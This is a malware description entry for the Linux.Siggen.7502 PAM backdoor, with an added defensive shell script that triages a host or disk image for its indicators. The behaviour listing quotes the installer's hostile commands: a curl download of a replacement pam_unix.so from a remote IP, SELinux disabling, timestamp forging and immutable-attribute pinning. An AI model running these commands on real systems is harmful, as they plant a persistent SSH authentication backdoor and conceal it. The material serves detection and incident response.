Linux.Siggen.7502
Added to the Dr.Web virus database:
2024-05-21
Virus description added:
2024-05-21
Technical Information
Malicious functions:
Manages services:
- systemctl restart sshd
- systemctl daemon-reload
- systemctl enable ddaemon
- systemctl start ddaemon
Launches processes:
- sh /usr/bin/jc_new.sh
- tr -d .
- mv /lib/x86_64-linux-gnu/security/pam_unix.so /lib/x86_64-linux-gnu/security/pam_unix.so.bak
- chattr +ia /etc/selinux/config
- cut -c1-3
- chattr +ia /lib/x86_64-linux-gnu/security/pam_unix.so
- sed -i s/^UsePAM no/UsePAM yes/ /etc/ssh/sshd_config
- head -1
- grep -oP pam-\K[\d\.]+
- sed -i s/SELINUX=enforcing/SELINUX=disabled/ /etc/selinux/config
- touch /lib/x86_64-linux-gnu/security/pam_unix.so -r /lib/x86_64-linux-gnu/security/pam_unix.so.bak
- chmod 644 /lib/x86_64-linux-gnu/security/pam_unix.so
- curl -o /lib/x86_64-linux-gnu/security/pam_unix.so http://103.101.205.192:90/jc/pam_unix.so_v
- /bin/sh /usr/bin/which curl
- rm -- /usr/bin/jc_new.sh
- chattr -ia /lib/x86_64-linux-gnu/security/pam_unix.so
Performs operations with the file system:
Modifies file access rights:
- /usr/lib/x86_64-linux-gnu/security/pam_unix.so
Creates or modifies files:
- /run/ddaemon.pid
- /usr/bin/jc_new.sh
- /usr/lib/x86_64-linux-gnu/security/pam_unix.so
- /etc/ssh/sed087j9z
- /etc/systemd/system/ddaemon.service
Changes time of creation/access/modification of files:
- /usr/lib/x86_64-linux-gnu/security/pam_unix.so
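The process list above is one installer procedure: jc_new.sh finds the installed PAM version (the grep/head/cut/tr chain), backs up pam_unix.so, downloads a replacement over plain HTTP, copies the backup's timestamp onto it with touch -r, pins it with chattr +ia, forces UsePAM yes in sshd_config, disables SELinux in /etc/selinux/config, restarts sshd, and registers a ddaemon unit. The /etc/ssh/sed087j9z file is the temporary file GNU sed -i creates beside the file it rewrites. Because the timestamp is forged, a triage that compares mtimes will miss the swap; the checks below look at the artifacts, config flips, immutable attributes and the package database instead. This script is an added example, not Dr.Web's tooling; the paths come from the listing, the root-prefix argument (for a mounted image) and the ExecStart extraction are assumptions, and the package names libpam-modules/pam are the Debian/RHEL defaults.

```shell
#!/bin/sh
# Triage checks for the Linux.Siggen.7502 indicators listed above (added example).
# Every check takes an optional root prefix: "" or "/" for the live host, or a
# mount point of a disk image. Output is one line per finding.

PAM_PATHS="/lib/x86_64-linux-gnu/security/pam_unix.so /usr/lib/x86_64-linux-gnu/security/pam_unix.so"

# Files the listing shows being created or left behind by the installer.
find_dropped_artifacts() {
    root="${1:-}"; root="${root%/}"
    for p in /usr/bin/jc_new.sh \
             /etc/systemd/system/ddaemon.service \
             /run/ddaemon.pid \
             /etc/ssh/sed087j9z \
             /lib/x86_64-linux-gnu/security/pam_unix.so.bak \
             /usr/lib/x86_64-linux-gnu/security/pam_unix.so.bak; do
        [ -e "$root$p" ] && printf 'ARTIFACT %s\n' "$p"
    done
    return 0
}

# The installer rewrites "UsePAM no" to "UsePAM yes" so sshd consults the swapped module.
sshd_uses_pam() {
    root="${1:-}"; root="${root%/}"
    grep -Eq '^[[:space:]]*UsePAM[[:space:]]+yes' "$root/etc/ssh/sshd_config" 2>/dev/null
}

# The installer rewrites SELINUX=enforcing to SELINUX=disabled.
selinux_disabled_in_config() {
    root="${1:-}"; root="${root%/}"
    grep -Eq '^SELINUX=disabled' "$root/etc/selinux/config" 2>/dev/null
}

# chattr +i leaves an "i" in the attribute field printed by lsattr; package
# managers never set it on a PAM module or on /etc/selinux/config.
has_immutable_attr() {
    lsattr -d "$1" 2>/dev/null | awk '{print $1}' | grep -q 'i'
}

# What the enabled ddaemon unit actually executes.
ddaemon_exec_start() {
    root="${1:-}"; root="${root%/}"
    sed -n 's/^ExecStart=//p' "$root/etc/systemd/system/ddaemon.service" 2>/dev/null
}

# Live-host only: compare pam_unix.so against the package database. Prints a
# line only when the on-disk file differs from what the package shipped.
verify_pam_package() {
    if command -v dpkg >/dev/null 2>&1; then
        dpkg -V libpam-modules 2>/dev/null | grep 'pam_unix.so'
    elif command -v rpm >/dev/null 2>&1; then
        rpm -V pam 2>/dev/null | grep 'pam_unix.so'
    fi
    return 0
}

triage() {
    root="${1:-}"; root="${root%/}"
    find_dropped_artifacts "$root"
    sshd_uses_pam "$root" && echo 'CONFIG sshd UsePAM yes'
    selinux_disabled_in_config "$root" && echo 'CONFIG SELINUX=disabled'
    for m in $PAM_PATHS /etc/selinux/config; do
        [ -e "$root$m" ] && has_immutable_attr "$root$m" && printf 'ATTR immutable %s\n' "$m"
    done
    unit="$(ddaemon_exec_start "$root")"
    [ -n "$unit" ] && printf 'UNIT ddaemon ExecStart=%s\n' "$unit"
    [ -z "$root" ] && verify_pam_package
    return 0
}

# Usage: sh triage.sh /            (live host)
#        sh triage.sh /mnt/image   (mounted disk image; package check is skipped)
if [ "$#" -gt 0 ]; then
    triage "$1"
fi
```

Two caveats when acting on findings: chattr -ia must be run on pam_unix.so and /etc/selinux/config before either can be restored, and the dpkg/rpm verification relies on md5sums/headers stored on the same disk, so on a host with root compromise the authoritative comparison is a hash of pam_unix.so against the original package downloaded from a clean mirror.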